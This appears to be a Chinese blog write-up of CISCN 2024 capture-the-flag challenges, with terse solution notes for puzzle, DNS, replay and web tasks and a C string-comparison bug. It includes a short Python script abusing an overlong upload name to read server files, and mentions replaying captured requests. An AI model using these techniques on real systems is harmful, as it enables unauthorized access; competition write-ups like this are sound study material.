神秘文件
- part1:
metadata
- part2:内嵌到
word
里面 - part3:没有密钥的
VBA
rc4
- part4:画的
base64
- part5:
ppt
注释 - part6: 外面有个拼图,拼出来
base64
- part7:
slide4.xml
13轮base64
- part8:
slidelayout2.xml
去掉特定字符后base64
- part9:
furry
图片中有base64
- part10: 直接维吉尼亚
- part1:
toughdns
用前面的
01
串的域名能拼成二维码,扫描得字符串从
85
条开始后最后的字节都是一个十六进制提取下来:90方 看,噢txt
请求中有两个id
id=4500
zip,密码是上面的字符串解压得到 pgp 私钥
id=6421
一个奇怪的密文
根据题上的描述,对十六进制串每个字节高低四位交换,用私钥解密得到flag
火锅
BP抓包重放0
直接点击领取NFT获取flag
p&p
这个之前见过类似的,目录溢出
1
2
3
4
5
6
7
8
9
10
11
12
13import requests
url=
def func():
data="11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111static/1"
requests.get(url+"upload?name="+data)
requests.get(url+"test")
res=requests.get(url+"static/1")
print(res.text)
if __name__ == "__main__":
func()特定用户信息泄露(可能叫这个吧
这题差点拿下,痛失排名向前进200的机会
最终怎么寄在了指针上面,卢神全责
前面的部分凭感觉直接写了,后面的思路对了,但没写对啊嗯
标准答案是
1
2
3int 函数名忘了(char * record_name,char * user_name,char * read_name){
return !strcmp(user_name,read_name) && !strcmp(record_name,"salary");
}我写成
1
2
3
4int 函数名忘了(char * record_name,char * user_name,char * read_name){
if(user_name==read_name && record_name=="salary") return 1;
return 0;
}就不对了(乐
是不是有点太难的CISCN
- 本文链接: http://noone40404.github.io/2024/05/19/CISCN2024/
- 版权声明: 本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!